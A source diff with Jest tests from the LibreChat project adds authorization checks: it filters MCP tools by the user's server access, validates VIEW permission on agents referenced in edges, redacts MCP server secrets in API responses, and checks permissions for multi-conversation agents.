test('should preserve existing MCP tools when server not in configs (disconnected)', async () => {
mockGetAllServerConfigs.mockResolvedValue({});
mockReq.user.id = existingAgentAuthorId.toString();
mockReq.params.id = existingAgentId;
mockReq.body = {
name: 'Edited While Disconnected',
tools: ['web_search', `existingTool${d}authorizedServer`],
};
await updateAgentHandler(mockReq, mockRes);
expect(mockRes.json).toHaveBeenCalled();
const updatedAgent = mockRes.json.mock.calls[0][0];
expect(updatedAgent.tools).toContain(`existingTool${d}authorizedServer`);
expect(updatedAgent.name).toBe('Edited While Disconnected');
});
});
describe('duplicateAgentHandler - MCP tool authorization', () => {
let sourceAgentId;
let sourceAgentAuthorId;
beforeEach(async () => {
sourceAgentAuthorId = new mongoose.Types.ObjectId();
const agent = await Agent.create({
id: `agent_${uuidv4()}`,
name: 'Source Agent',
provider: 'openai',
model: 'gpt-4',
author: sourceAgentAuthorId,
tools: ['web_search', `tool${d}authorizedServer`, `tool${d}forbiddenServer`],
mcpServerNames: ['authorizedServer', 'forbiddenServer'],
versions: [
{
name: 'Source Agent',
provider: 'openai',
model: 'gpt-4',
tools: ['web_search', `tool${d}authorizedServer`, `tool${d}forbiddenServer`],
createdAt: new Date(),
updatedAt: new Date(),
},
],
});
sourceAgentId = agent.id;
});
test('should strip unauthorized MCP tools from duplicated agent', async () => {
mockGetAllServerConfigs.mockResolvedValue({
authorizedServer: { type: 'sse' },
});
mockReq.user.id = sourceAgentAuthorId.toString();
mockReq.params.id = sourceAgentId;
await duplicateAgentHandler(mockReq, mockRes);
expect(mockRes.status).toHaveBeenCalledWith(201);
const { agent: newAgent } = mockRes.json.mock.calls[0][0];
expect(newAgent.id).not.toBe(sourceAgentId);
expect(newAgent.tools).toContain('web_search');
expect(newAgent.tools).toContain(`tool${d}authorizedServer`);
expect(newAgent.tools).not.toContain(`tool${d}forbiddenServer`);
const agentInDb = await Agent.findOne({ id: newAgent.id });
expect(agentInDb.mcpServerNames).toContain('authorizedServer');
expect(agentInDb.mcpServerNames).not.toContain('forbiddenServer');
});
test('should preserve source agent MCP tools when registry is unavailable', async () => {
getMCPServersRegistry.mockImplementation(() => {
throw new Error('MCPServersRegistry has not been initialized.');
});
mockReq.user.id = sourceAgentAuthorId.toString();
mockReq.params.id = sourceAgentId;
await duplicateAgentHandler(mockReq, mockRes);
expect(mockRes.status).toHaveBeenCalledWith(201);
const { agent: newAgent } = mockRes.json.mock.calls[0][0];
expect(newAgent.tools).toContain('web_search');
expect(newAgent.tools).toContain(`tool${d}authorizedServer`);
expect(newAgent.tools).toContain(`tool${d}forbiddenServer`);
});
});
describe('revertAgentVersionHandler - MCP tool authorization', () => {
let existingAgentId;
let existingAgentAuthorId;
beforeEach(async () => {
existingAgentAuthorId = new mongoose.Types.ObjectId();
const agent = await Agent.create({
id: `agent_${uuidv4()}`,
name: 'Reverted Agent V2',
provider: 'openai',
model: 'gpt-4',
author: existingAgentAuthorId,
tools: ['web_search'],
versions: [
{
name: 'Reverted Agent V1',
provider: 'openai',
model: 'gpt-4',
tools: ['web_search', `oldTool${d}revokedServer`],
createdAt: new Date(Date.now() - 10000),
updatedAt: new Date(Date.now() - 10000),
},
{
name: 'Reverted Agent V2',
provider: 'openai',
model: 'gpt-4',
tools: ['web_search'],
createdAt: new Date(),
updatedAt: new Date(),
},
],
});
existingAgentId = agent.id;
});
test('should strip unauthorized MCP tools after reverting to a previous version', async () => {
mockGetAllServerConfigs.mockResolvedValue({
authorizedServer: { type: 'sse' },
});
mockReq.user.id = existingAgentAuthorId.toString();
mockReq.params.id = existingAgentId;
mockReq.body = { version_index: 0 };
await revertAgentVersionHandler(mockReq, mockRes);
expect(mockRes.json).toHaveBeenCalled();
const result = mockRes.json.mock.calls[0][0];
expect(result.tools).toContain('web_search');
expect(result.tools).not.toContain(`oldTool${d}revokedServer`);
const agentInDb = await Agent.findOne({ id: existingAgentId });
expect(agentInDb.tools).toContain('web_search');
expect(agentInDb.tools).not.toContain(`oldTool${d}revokedServer`);
});
test('should keep authorized MCP tools after revert', async () => {
await Agent.updateOne(
{ id: existingAgentId },
{ $set: { 'versions.0.tools': ['web_search', `tool${d}authorizedServer`] } },
);
mockReq.user.id = existingAgentAuthorId.toString();
mockReq.params.id = existingAgentId;
mockReq.body = { version_index: 0 };
await revertAgentVersionHandler(mockReq, mockRes);
expect(mockRes.json).toHaveBeenCalled();
const result = mockRes.json.mock.calls[0][0];
expect(result.tools).toContain('web_search');
expect(result.tools).toContain(`tool${d}authorizedServer`);
});
test('should preserve version MCP tools when registry is unavailable on revert', async () => {
await Agent.updateOne(
{ id: existingAgentId },
{
$set: {
'versions.0.tools': [
'web_search',
`validTool${d}authorizedServer`,
`otherTool${d}anotherServer`,
],
},
},
);
getMCPServersRegistry.mockImplementation(() => {
throw new Error('MCPServersRegistry has not been initialized.');
});
mockReq.user.id = existingAgentAuthorId.toString();
mockReq.params.id = existingAgentId;
mockReq.body = { version_index: 0 };
await revertAgentVersionHandler(mockReq, mockRes);
expect(mockRes.json).toHaveBeenCalled();
const result = mockRes.json.mock.calls[0][0];
expect(result.tools).toContain('web_search');
expect(result.tools).toContain(`validTool${d}authorizedServer`);
expect(result.tools).toContain(`otherTool${d}anotherServer`);
const agentInDb = await Agent.findOne({ id: existingAgentId });
expect(agentInDb.tools).toContain(`validTool${d}authorizedServer`);
expect(agentInDb.tools).toContain(`otherTool${d}anotherServer`);
});
});
});


@@ -265,6 +265,7 @@ const OpenAIChatCompletionController = async (req, res) => {
         toolRegistry: primaryConfig.toolRegistry,
         userMCPAuthMap: primaryConfig.userMCPAuthMap,
         tool_resources: primaryConfig.tool_resources,
+        actionsEnabled: primaryConfig.actionsEnabled,
       });
     },
     toolEndCallback,


@@ -429,6 +429,7 @@ const createResponse = async (req, res) => {
         toolRegistry: primaryConfig.toolRegistry,
         userMCPAuthMap: primaryConfig.userMCPAuthMap,
         tool_resources: primaryConfig.tool_resources,
+        actionsEnabled: primaryConfig.actionsEnabled,
       });
     },
     toolEndCallback,
@@ -586,6 +587,7 @@ const createResponse = async (req, res) => {
         toolRegistry: primaryConfig.toolRegistry,
         userMCPAuthMap: primaryConfig.userMCPAuthMap,
         tool_resources: primaryConfig.tool_resources,
+        actionsEnabled: primaryConfig.actionsEnabled,
       });
     },
     toolEndCallback,


@@ -6,6 +6,7 @@ const {
   agentCreateSchema,
   agentUpdateSchema,
   refreshListAvatars,
+  collectEdgeAgentIds,
   mergeAgentOcrConversion,
   MAX_AVATAR_REFRESH_AGENTS,
   convertOcrToContextInPlace,
@@ -35,6 +36,7 @@ const {
 } = require('~/models/Agent');
 const {
   findPubliclyAccessibleResources,
+  getResourcePermissionsMap,
   findAccessibleResources,
   hasPublicPermission,
   grantPermission,
@@ -47,6 +49,7 @@ const { refreshS3Url } = require('~/server/services/Files/S3/crud');
 const { filterFile } = require('~/server/services/Files/process');
 const { updateAction, getActions } = require('~/models/Action');
 const { getCachedTools } = require('~/server/services/Config');
+const { getMCPServersRegistry } = require('~/config');
 const { getLogStores } = require('~/cache');

 const systemTools = {
@@ -58,6 +61,116 @@ const systemTools = {
 const MAX_SEARCH_LEN = 100;
 const escapeRegex = (str = '') => str.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
/**
* Validates that the requesting user has VIEW access to every agent referenced in edges.
* Agents that do not exist in the database are skipped: at create time, the `from` field
* often references the agent being built, which has no DB record yet.
* @param {import('librechat-data-provider').GraphEdge[]} edges
* @param {string} userId
* @param {string} userRole - Used for group/role principal resolution
* @returns {Promise<string[]>} Agent IDs the user cannot VIEW (empty if all accessible)
*/
const validateEdgeAgentAccess = async (edges, userId, userRole) => {
const edgeAgentIds = collectEdgeAgentIds(edges);
if (edgeAgentIds.size === 0) {
return [];
}
const agents = (await Promise.all([...edgeAgentIds].map((id) => getAgent({ id })))).filter(
Boolean,
);
if (agents.length === 0) {
return [];
}
const permissionsMap = await getResourcePermissionsMap({
userId,
role: userRole,
resourceType: ResourceType.AGENT,
resourceIds: agents.map((a) => a._id),
});
return agents
.filter((a) => {
const bits = permissionsMap.get(a._id.toString()) ?? 0;
return (bits & PermissionBits.VIEW) === 0;
})
.map((a) => a.id);
};
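The VIEW filter above is a plain bitwise test against the permissions map. A minimal standalone sketch of the same check, with the bit values assumed to mirror `PermissionBits` (1=view, 2=edit, 4=delete, 8=share, as documented elsewhere in this PR):

```javascript
// Hypothetical bits mirroring PermissionBits; values assumed for illustration.
const PermissionBits = { VIEW: 1, EDIT: 2, DELETE: 4, SHARE: 8 };

// An agent is reported as unauthorized when the user's bits lack VIEW.
function lacksView(permissionsMap, agentKey) {
  const bits = permissionsMap.get(agentKey) ?? 0;
  return (bits & PermissionBits.VIEW) === 0;
}

const perms = new Map([
  ['agentA', PermissionBits.VIEW | PermissionBits.EDIT], // VIEW present
  ['agentB', PermissionBits.EDIT], // EDIT without VIEW
]);

console.log(lacksView(perms, 'agentA')); // false
console.log(lacksView(perms, 'agentB')); // true
console.log(lacksView(perms, 'agentC')); // true (absent from map => 0)
```

Note the `?? 0` default: an agent missing from the map is treated as no access, which is why absent permission entries also end up in the unauthorized list.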
/**
* Filters tools to only include those the user is authorized to use.
* MCP tools must match the exact format `{toolName}_mcp_{serverName}` (exactly 2 segments).
* Multi-delimiter keys are rejected to prevent authorization/execution mismatch.
* Non-MCP tools must appear in availableTools (global tool cache) or systemTools.
*
* When `existingTools` is provided and the MCP registry is unavailable (e.g. server restart),
* tools already present on the agent are preserved rather than stripped; they were validated
* when originally added, and we cannot re-verify them without the registry.
* @param {object} params
* @param {string[]} params.tools - Raw tool strings from the request
* @param {string} params.userId - Requesting user ID for MCP server access check
* @param {Record<string, unknown>} params.availableTools - Global non-MCP tool cache
* @param {string[]} [params.existingTools] - Tools already persisted on the agent document
* @returns {Promise<string[]>} Only the authorized subset of tools
*/
const filterAuthorizedTools = async ({ tools, userId, availableTools, existingTools }) => {
const filteredTools = [];
let mcpServerConfigs;
let registryUnavailable = false;
const existingToolSet = existingTools?.length ? new Set(existingTools) : null;
for (const tool of tools) {
if (availableTools[tool] || systemTools[tool]) {
filteredTools.push(tool);
continue;
}
if (!tool?.includes(Constants.mcp_delimiter)) {
continue;
}
if (mcpServerConfigs === undefined) {
try {
mcpServerConfigs = (await getMCPServersRegistry().getAllServerConfigs(userId)) ?? {};
} catch (e) {
logger.warn(
'[filterAuthorizedTools] MCP registry unavailable, filtering all MCP tools',
e.message,
);
mcpServerConfigs = {};
registryUnavailable = true;
}
}
const parts = tool.split(Constants.mcp_delimiter);
if (parts.length !== 2) {
logger.warn(
`[filterAuthorizedTools] Rejected malformed MCP tool key "${tool}" for user ${userId}`,
);
continue;
}
if (registryUnavailable && existingToolSet?.has(tool)) {
filteredTools.push(tool);
continue;
}
const [, serverName] = parts;
if (!serverName || !Object.hasOwn(mcpServerConfigs, serverName)) {
logger.warn(
`[filterAuthorizedTools] Rejected MCP tool "${tool}" — server "${serverName}" not accessible to user ${userId}`,
);
continue;
}
filteredTools.push(tool);
}
return filteredTools;
};
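The strict two-segment rule enforced above can be shown in isolation. A minimal sketch, assuming the delimiter literal is `_mcp_` (the concrete value of `Constants.mcp_delimiter` is an assumption here, as is the helper name):

```javascript
// Sketch of the two-segment MCP key rule used by filterAuthorizedTools.
// The `_mcp_` delimiter value is an illustrative assumption.
const MCP_DELIMITER = '_mcp_';

function parseMCPToolKey(tool) {
  if (!tool || !tool.includes(MCP_DELIMITER)) {
    return null; // not an MCP tool key at all
  }
  const parts = tool.split(MCP_DELIMITER);
  if (parts.length !== 2) {
    return null; // multi-delimiter keys are rejected outright
  }
  const [toolName, serverName] = parts;
  if (!toolName || !serverName) {
    return null; // empty segments are also malformed
  }
  return { toolName, serverName };
}

// Well-formed: exactly one delimiter, both segments non-empty.
console.log(parseMCPToolKey('search_mcp_myServer')); // { toolName: 'search', serverName: 'myServer' }
// Two delimiters split into three segments and are rejected.
console.log(parseMCPToolKey('a_mcp_b_mcp_c')); // null
```

Rejecting anything other than exactly two segments is what prevents the authorization/execution mismatch the JSDoc mentions: a key that parses differently at check time and at dispatch time can never pass the filter.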
 /**
  * Creates an Agent.
  * @route POST /Agents
@@ -75,22 +188,24 @@ const createAgentHandler = async (req, res) => {
     agentData.model_parameters = removeNullishValues(agentData.model_parameters, true);
   }

-  const { id: userId } = req.user;
+  const { id: userId, role: userRole } = req.user;
+
+  if (agentData.edges?.length) {
+    const unauthorized = await validateEdgeAgentAccess(agentData.edges, userId, userRole);
+    if (unauthorized.length > 0) {
+      return res.status(403).json({
+        error: 'You do not have access to one or more agents referenced in edges',
+        agent_ids: unauthorized,
+      });
+    }
+  }

   agentData.id = `agent_${nanoid()}`;
   agentData.author = userId;
   agentData.tools = [];

   const availableTools = (await getCachedTools()) ?? {};
-  for (const tool of tools) {
-    if (availableTools[tool]) {
-      agentData.tools.push(tool);
-    } else if (systemTools[tool]) {
-      agentData.tools.push(tool);
-    } else if (tool.includes(Constants.mcp_delimiter)) {
-      agentData.tools.push(tool);
-    }
-  }
+  agentData.tools = await filterAuthorizedTools({ tools, userId, availableTools });

   const agent = await createAgent(agentData);
@@ -243,6 +358,17 @@ const updateAgentHandler = async (req, res) => {
     updateData.avatar = avatarField;
   }

+  if (updateData.edges?.length) {
+    const { id: userId, role: userRole } = req.user;
+    const unauthorized = await validateEdgeAgentAccess(updateData.edges, userId, userRole);
+    if (unauthorized.length > 0) {
+      return res.status(403).json({
+        error: 'You do not have access to one or more agents referenced in edges',
+        agent_ids: unauthorized,
+      });
+    }
+  }
+
   // Convert OCR to context in incoming updateData
   convertOcrToContextInPlace(updateData);
@@ -261,6 +387,26 @@ const updateAgentHandler = async (req, res) => {
     updateData.tools = ocrConversion.tools;
   }

+  if (updateData.tools) {
+    const existingToolSet = new Set(existingAgent.tools ?? []);
+    const newMCPTools = updateData.tools.filter(
+      (t) => !existingToolSet.has(t) && t?.includes(Constants.mcp_delimiter),
+    );
+    if (newMCPTools.length > 0) {
+      const availableTools = (await getCachedTools()) ?? {};
+      const approvedNew = await filterAuthorizedTools({
+        tools: newMCPTools,
+        userId: req.user.id,
+        availableTools,
+      });
+      const rejectedSet = new Set(newMCPTools.filter((t) => !approvedNew.includes(t)));
+      if (rejectedSet.size > 0) {
+        updateData.tools = updateData.tools.filter((t) => !rejectedSet.has(t));
+      }
+    }
+  }
+
   let updatedAgent =
     Object.keys(updateData).length > 0
       ? await updateAgent({ id }, updateData, {
@@ -371,7 +517,7 @@ const duplicateAgentHandler = async (req, res) => {
    */
   const duplicateAction = async (action) => {
     const newActionId = nanoid();
-    const [domain] = action.action_id.split(actionDelimiter);
+    const { domain } = action.metadata;
     const fullActionId = `${domain}${actionDelimiter}${newActionId}`;

     // Sanitize sensitive metadata before persisting
@@ -381,7 +527,7 @@ const duplicateAgentHandler = async (req, res) => {
     }

     const newAction = await updateAction(
-      { action_id: newActionId },
+      { action_id: newActionId, agent_id: newAgentId },
       {
         metadata: filteredMetadata,
         agent_id: newAgentId,
@@ -403,6 +549,17 @@ const duplicateAgentHandler = async (req, res) => {
   const agentActions = await Promise.all(promises);
   newAgentData.actions = agentActions;

+  if (newAgentData.tools?.length) {
+    const availableTools = (await getCachedTools()) ?? {};
+    newAgentData.tools = await filterAuthorizedTools({
+      tools: newAgentData.tools,
+      userId,
+      availableTools,
+      existingTools: newAgentData.tools,
+    });
+  }
+
   const newAgent = await createAgent(newAgentData);

   try {
@@ -731,7 +888,24 @@ const revertAgentVersionHandler = async (req, res) => {
   // Permissions are enforced via route middleware (ACL EDIT)
-  const updatedAgent = await revertAgentVersion({ id }, version_index);
+  let updatedAgent = await revertAgentVersion({ id }, version_index);
+
+  if (updatedAgent.tools?.length) {
+    const availableTools = (await getCachedTools()) ?? {};
+    const filteredTools = await filterAuthorizedTools({
+      tools: updatedAgent.tools,
+      userId: req.user.id,
+      availableTools,
+      existingTools: updatedAgent.tools,
+    });
+    if (filteredTools.length !== updatedAgent.tools.length) {
+      updatedAgent = await updateAgent(
+        { id },
+        { tools: filteredTools },
+        { updatingUserId: req.user.id },
+      );
+    }
+  }

   if (updatedAgent.author) {
     updatedAgent.author = updatedAgent.author.toString();
@@ -799,4 +973,5 @@ module.exports = {
   uploadAgentAvatar: uploadAgentAvatarHandler,
   revertAgentVersion: revertAgentVersionHandler,
   getAgentCategories,
+  filterAuthorizedTools,
 };
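The duplicate and revert handlers pass `existingTools` so that, when the MCP registry is unavailable, previously persisted MCP tools survive the filter instead of being stripped. A minimal standalone sketch of that fallback rule, with the delimiter value and function names invented for illustration:

```javascript
// Sketch of the existingTools fallback: with the registry down, an MCP tool
// survives only if it was already persisted on the agent. The `_mcp_`
// delimiter and all names here are illustrative assumptions.
const MCP_DELIMITER = '_mcp_';

function filterWithFallback(tools, serverConfigs, registryUnavailable, existingTools) {
  const existing = new Set(existingTools ?? []);
  return tools.filter((tool) => {
    if (!tool.includes(MCP_DELIMITER)) {
      return true; // non-MCP tools are vetted by other checks upstream
    }
    if (registryUnavailable) {
      return existing.has(tool); // preserve only previously validated tools
    }
    const [, serverName] = tool.split(MCP_DELIMITER);
    return Object.hasOwn(serverConfigs, serverName);
  });
}

// Registry up: only tools whose server appears in the configs survive.
console.log(filterWithFallback(['a_mcp_ok', 'b_mcp_bad'], { ok: {} }, false, [])); // ['a_mcp_ok']
// Registry down: persisted tools are kept, newly requested ones are stripped.
console.log(filterWithFallback(['a_mcp_old', 'b_mcp_new'], {}, true, ['a_mcp_old'])); // ['a_mcp_old']
```

This matches the behavior the tests above assert: a registry outage must not silently strip a duplicated or reverted agent's already approved MCP tools.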


@@ -2,7 +2,7 @@ const mongoose = require('mongoose');
 const { nanoid } = require('nanoid');
 const { v4: uuidv4 } = require('uuid');
 const { agentSchema } = require('@librechat/data-schemas');
-const { FileSources } = require('librechat-data-provider');
+const { FileSources, PermissionBits } = require('librechat-data-provider');
 const { MongoMemoryServer } = require('mongodb-memory-server');

 // Only mock the dependencies that are not database-related
@@ -46,9 +46,9 @@ jest.mock('~/models/File', () => ({
 jest.mock('~/server/services/PermissionService', () => ({
   findAccessibleResources: jest.fn().mockResolvedValue([]),
   findPubliclyAccessibleResources: jest.fn().mockResolvedValue([]),
+  getResourcePermissionsMap: jest.fn().mockResolvedValue(new Map()),
   grantPermission: jest.fn(),
   hasPublicPermission: jest.fn().mockResolvedValue(false),
-  checkPermission: jest.fn().mockResolvedValue(true),
 }));

 jest.mock('~/models', () => ({
@@ -74,6 +74,7 @@ const {
 const {
   findAccessibleResources,
   findPubliclyAccessibleResources,
+  getResourcePermissionsMap,
 } = require('~/server/services/PermissionService');

 const { refreshS3Url } = require('~/server/services/Files/S3/crud');
@@ -1647,4 +1648,112 @@ describe('Agent Controllers - Mass Assignment Protection', () => {
       expect(agent.avatar.filepath).toBe('old-s3-path.jpg');
     });
   });
describe('Edge ACL validation', () => {
let targetAgent;
beforeEach(async () => {
targetAgent = await Agent.create({
id: `agent_${nanoid()}`,
author: new mongoose.Types.ObjectId().toString(),
name: 'Target Agent',
provider: 'openai',
model: 'gpt-4',
tools: [],
});
});
test('createAgentHandler should return 403 when user lacks VIEW on an edge-referenced agent', async () => {
const permMap = new Map();
getResourcePermissionsMap.mockResolvedValueOnce(permMap);
mockReq.body = {
name: 'Attacker Agent',
provider: 'openai',
model: 'gpt-4',
edges: [{ from: 'self_placeholder', to: targetAgent.id, edgeType: 'handoff' }],
};
await createAgentHandler(mockReq, mockRes);
expect(mockRes.status).toHaveBeenCalledWith(403);
const response = mockRes.json.mock.calls[0][0];
expect(response.agent_ids).toContain(targetAgent.id);
});
test('createAgentHandler should succeed when user has VIEW on all edge-referenced agents', async () => {
const permMap = new Map([[targetAgent._id.toString(), 1]]);
getResourcePermissionsMap.mockResolvedValueOnce(permMap);
mockReq.body = {
name: 'Legit Agent',
provider: 'openai',
model: 'gpt-4',
edges: [{ from: 'self_placeholder', to: targetAgent.id, edgeType: 'handoff' }],
};
await createAgentHandler(mockReq, mockRes);
expect(mockRes.status).toHaveBeenCalledWith(201);
});
test('createAgentHandler should allow edges referencing non-existent agents (self-reference at create time)', async () => {
mockReq.body = {
name: 'Self-Ref Agent',
provider: 'openai',
model: 'gpt-4',
edges: [{ from: 'agent_does_not_exist_yet', to: 'agent_also_new', edgeType: 'handoff' }],
};
await createAgentHandler(mockReq, mockRes);
expect(mockRes.status).toHaveBeenCalledWith(201);
});
test('updateAgentHandler should return 403 when user lacks VIEW on an edge-referenced agent', async () => {
const ownedAgent = await Agent.create({
id: `agent_${nanoid()}`,
author: mockReq.user.id,
name: 'Owned Agent',
provider: 'openai',
model: 'gpt-4',
tools: [],
});
const permMap = new Map([[ownedAgent._id.toString(), PermissionBits.VIEW]]);
getResourcePermissionsMap.mockResolvedValueOnce(permMap);
mockReq.params = { id: ownedAgent.id };
mockReq.body = {
edges: [{ from: ownedAgent.id, to: targetAgent.id, edgeType: 'handoff' }],
};
await updateAgentHandler(mockReq, mockRes);
expect(mockRes.status).toHaveBeenCalledWith(403);
const response = mockRes.json.mock.calls[0][0];
expect(response.agent_ids).toContain(targetAgent.id);
expect(response.agent_ids).not.toContain(ownedAgent.id);
});
test('updateAgentHandler should succeed when edges field is absent from payload', async () => {
const ownedAgent = await Agent.create({
id: `agent_${nanoid()}`,
author: mockReq.user.id,
name: 'Owned Agent',
provider: 'openai',
model: 'gpt-4',
tools: [],
});
mockReq.params = { id: ownedAgent.id };
mockReq.body = { name: 'Renamed Agent' };
await updateAgentHandler(mockReq, mockRes);
expect(mockRes.status).not.toHaveBeenCalledWith(403);
const response = mockRes.json.mock.calls[0][0];
expect(response.name).toBe('Renamed Agent');
});
});
});


@@ -7,9 +7,11 @@
  */
 const { logger } = require('@librechat/data-schemas');
 const {
+  MCPErrorCodes,
+  redactServerSecrets,
+  redactAllServerSecrets,
   isMCPDomainNotAllowedError,
   isMCPInspectionFailedError,
-  MCPErrorCodes,
 } = require('@librechat/api');
 const { Constants, MCPServerUserInputSchema } = require('librechat-data-provider');
 const { cacheMCPServerTools, getMCPServerTools } = require('~/server/services/Config');
@@ -181,10 +183,8 @@ const getMCPServersList = async (req, res) => {
       return res.status(401).json({ message: 'Unauthorized' });
     }

-    // 2. Get all server configs from registry (YAML + DB)
     const serverConfigs = await getMCPServersRegistry().getAllServerConfigs(userId);
-
-    return res.json(serverConfigs);
+    return res.json(redactAllServerSecrets(serverConfigs));
   } catch (error) {
     logger.error('[getMCPServersList]', error);
     res.status(500).json({ error: error.message });
@@ -215,7 +215,7 @@ const createMCPServerController = async (req, res) => {
     );
     res.status(201).json({
       serverName: result.serverName,
-      ...result.config,
+      ...redactServerSecrets(result.config),
     });
   } catch (error) {
     logger.error('[createMCPServer]', error);
@@ -243,7 +243,7 @@ const getMCPServerById = async (req, res) => {
       return res.status(404).json({ message: 'MCP server not found' });
     }

-    res.status(200).json(parsedConfig);
+    res.status(200).json(redactServerSecrets(parsedConfig));
   } catch (error) {
     logger.error('[getMCPServerById]', error);
     res.status(500).json({ message: error.message });
@@ -274,7 +274,7 @@ const updateMCPServerController = async (req, res) => {
       userId,
     );

-    res.status(200).json(parsedConfig);
+    res.status(200).json(redactServerSecrets(parsedConfig));
   } catch (error) {
     logger.error('[updateMCPServer]', error);
     const mcpErrorResponse = handleMCPError(error, res);


@@ -1,42 +1,144 @@
 const { logger } = require('@librechat/data-schemas');
 const {
   Constants,
+  Permissions,
   ResourceType,
+  SystemRoles,
+  PermissionTypes,
   isAgentsEndpoint,
   isEphemeralAgentId,
 } = require('librechat-data-provider');
+const { checkPermission } = require('~/server/services/PermissionService');
 const { canAccessResource } = require('./canAccessResource');
+const { getRoleByName } = require('~/models/Role');
 const { getAgent } = require('~/models/Agent');

 /**
- * Agent ID resolver function for agent_id from request body
- * Resolves custom agent ID (e.g., "agent_abc123") to MongoDB ObjectId
- * This is used specifically for chat routes where agent_id comes from request body
- *
+ * Resolves custom agent ID (e.g., "agent_abc123") to a MongoDB document.
  * @param {string} agentCustomId - Custom agent ID from request body
- * @returns {Promise<Object|null>} Agent document with _id field, or null if not found
+ * @returns {Promise<Object|null>} Agent document with _id field, or null if ephemeral/not found
  */
 const resolveAgentIdFromBody = async (agentCustomId) => {
-  // Handle ephemeral agents - they don't need permission checks
-  // Real agent IDs always start with "agent_", so anything else is ephemeral
   if (isEphemeralAgentId(agentCustomId)) {
-    return null; // No permission check needed for ephemeral agents
+    return null;
   }
-  return await getAgent({ id: agentCustomId });
+  return getAgent({ id: agentCustomId });
 };

 /**
- * Middleware factory that creates middleware to check agent access permissions from request body.
- * This middleware is specifically designed for chat routes where the agent_id comes from req.body
- * instead of route parameters.
+ * Creates a `canAccessResource` middleware for the given agent ID
+ * and chains to the provided continuation on success.
+ *
* @param {string} agentId - The agent's custom string ID (e.g., "agent_abc123")
* @param {number} requiredPermission - Permission bit(s) required
* @param {import('express').Request} req
* @param {import('express').Response} res - Written on deny; continuation called on allow
* @param {Function} continuation - Called when the permission check passes
* @returns {Promise<void>}
*/
const checkAgentResourceAccess = (agentId, requiredPermission, req, res, continuation) => {
const middleware = canAccessResource({
resourceType: ResourceType.AGENT,
requiredPermission,
resourceIdParam: 'agent_id',
idResolver: () => resolveAgentIdFromBody(agentId),
});
const tempReq = {
...req,
params: { ...req.params, agent_id: agentId },
};
return middleware(tempReq, res, continuation);
};
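The helper above adapts a params-based access middleware to an ID taken from the request body: it clones the request, grafts the ID into `params`, and passes a custom continuation instead of `next`. A minimal sketch of that adapter shape, with a stubbed middleware standing in for `canAccessResource` (all names here are illustrative assumptions):

```javascript
// Stub standing in for a params-based access middleware like canAccessResource:
// it reads req.params.agent_id and either continues or writes a 403.
function makeParamsMiddleware(allowedIds) {
  return (req, res, next) => {
    if (allowedIds.has(req.params.agent_id)) {
      return next();
    }
    res.statusCode = 403;
  };
}

// The adapter: clone the request, graft the body-sourced ID into params,
// and run the params-based middleware with a custom continuation.
function checkFromBody(middleware, agentId, req, res, continuation) {
  const tempReq = { ...req, params: { ...req.params, agent_id: agentId } };
  return middleware(tempReq, res, continuation);
}

const mw = makeParamsMiddleware(new Set(['agent_ok']));
const res = { statusCode: 200 };
let reached = false;
checkFromBody(mw, 'agent_ok', { params: {} }, res, () => { reached = true; });
console.log(reached); // true
checkFromBody(mw, 'agent_nope', { params: {} }, res, () => {});
console.log(res.statusCode); // 403
```

Cloning rather than mutating `req` matters: the original request object is untouched if the check denies access, and the continuation lets the caller chain a second check (here, the addedConvo check) after the primary one passes.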
/**
* Middleware factory that validates MULTI_CONVO:USE role permission and, when
* addedConvo.agent_id is a non-ephemeral agent, the same resource-level permission
* required for the primary agent (`requiredPermission`). Caches the resolved agent
* document on `req.resolvedAddedAgent` to avoid a duplicate DB fetch in `loadAddedAgent`.
*
* @param {number} requiredPermission - Permission bit(s) to check on the added agent resource
* @returns {(req: import('express').Request, res: import('express').Response, next: Function) => Promise<void>}
*/
const checkAddedConvoAccess = (requiredPermission) => async (req, res, next) => {
const addedConvo = req.body?.addedConvo;
if (!addedConvo || typeof addedConvo !== 'object' || Array.isArray(addedConvo)) {
return next();
}
try {
if (!req.user?.role) {
return res.status(403).json({
error: 'Forbidden',
message: 'Insufficient permissions for multi-conversation',
});
}
if (req.user.role !== SystemRoles.ADMIN) {
const role = await getRoleByName(req.user.role);
const hasMultiConvo = role?.permissions?.[PermissionTypes.MULTI_CONVO]?.[Permissions.USE];
if (!hasMultiConvo) {
return res.status(403).json({
error: 'Forbidden',
message: 'Multi-conversation feature is not enabled',
});
}
}
const addedAgentId = addedConvo.agent_id;
if (!addedAgentId || typeof addedAgentId !== 'string' || isEphemeralAgentId(addedAgentId)) {
return next();
}
if (req.user.role === SystemRoles.ADMIN) {
return next();
}
const agent = await resolveAgentIdFromBody(addedAgentId);
if (!agent) {
return res.status(404).json({
error: 'Not Found',
message: `${ResourceType.AGENT} not found`,
});
}
const hasPermission = await checkPermission({
userId: req.user.id,
role: req.user.role,
resourceType: ResourceType.AGENT,
resourceId: agent._id,
requiredPermission,
});
if (!hasPermission) {
return res.status(403).json({
error: 'Forbidden',
message: `Insufficient permissions to access this ${ResourceType.AGENT}`,
});
}
req.resolvedAddedAgent = agent;
return next();
} catch (error) {
logger.error('Failed to validate addedConvo access permissions', error);
return res.status(500).json({
error: 'Internal Server Error',
message: 'Failed to validate addedConvo access permissions',
});
}
};
/**
* Middleware factory that checks agent access permissions from request body.
* Validates both the primary agent_id and, when present, addedConvo.agent_id
* (which also requires MULTI_CONVO:USE role permission).
 *
 * @param {Object} options - Configuration options
 * @param {number} options.requiredPermission - The permission bit required (1=view, 2=edit, 4=delete, 8=share)
 * @returns {Function} Express middleware function
 *
 * @example
- * // Basic usage for agent chat (requires VIEW permission)
 * router.post('/chat',
 *   canAccessAgentFromBody({ requiredPermission: PermissionBits.VIEW }),
 *   buildEndpointOption,
@@ -46,11 +148,12 @@ const resolveAgentIdFromBody = async (agentCustomId) => {
 const canAccessAgentFromBody = (options) => {
   const { requiredPermission } = options;

-  // Validate required options
   if (!requiredPermission || typeof requiredPermission !== 'number') {
     throw new Error('canAccessAgentFromBody: requiredPermission is required and must be a number');
   }

+  const addedConvoMiddleware = checkAddedConvoAccess(requiredPermission);
+
   return async (req, res, next) => {
     try {
       const { endpoint, agent_id } = req.body;
@@ -67,28 +170,13 @@ const canAccessAgentFromBody = (options) => {
         });
       }

-      // Skip permission checks for ephemeral agents
-      // Real agent IDs always start with "agent_", so anything else is ephemeral
+      const afterPrimaryCheck = () => addedConvoMiddleware(req, res, next);
+
       if (isEphemeralAgentId(agentId)) {
-        return next();
+        return afterPrimaryCheck();
       }

-      const agentAccessMiddleware = canAccessResource({
-        resourceType: ResourceType.AGENT,
-        requiredPermission,
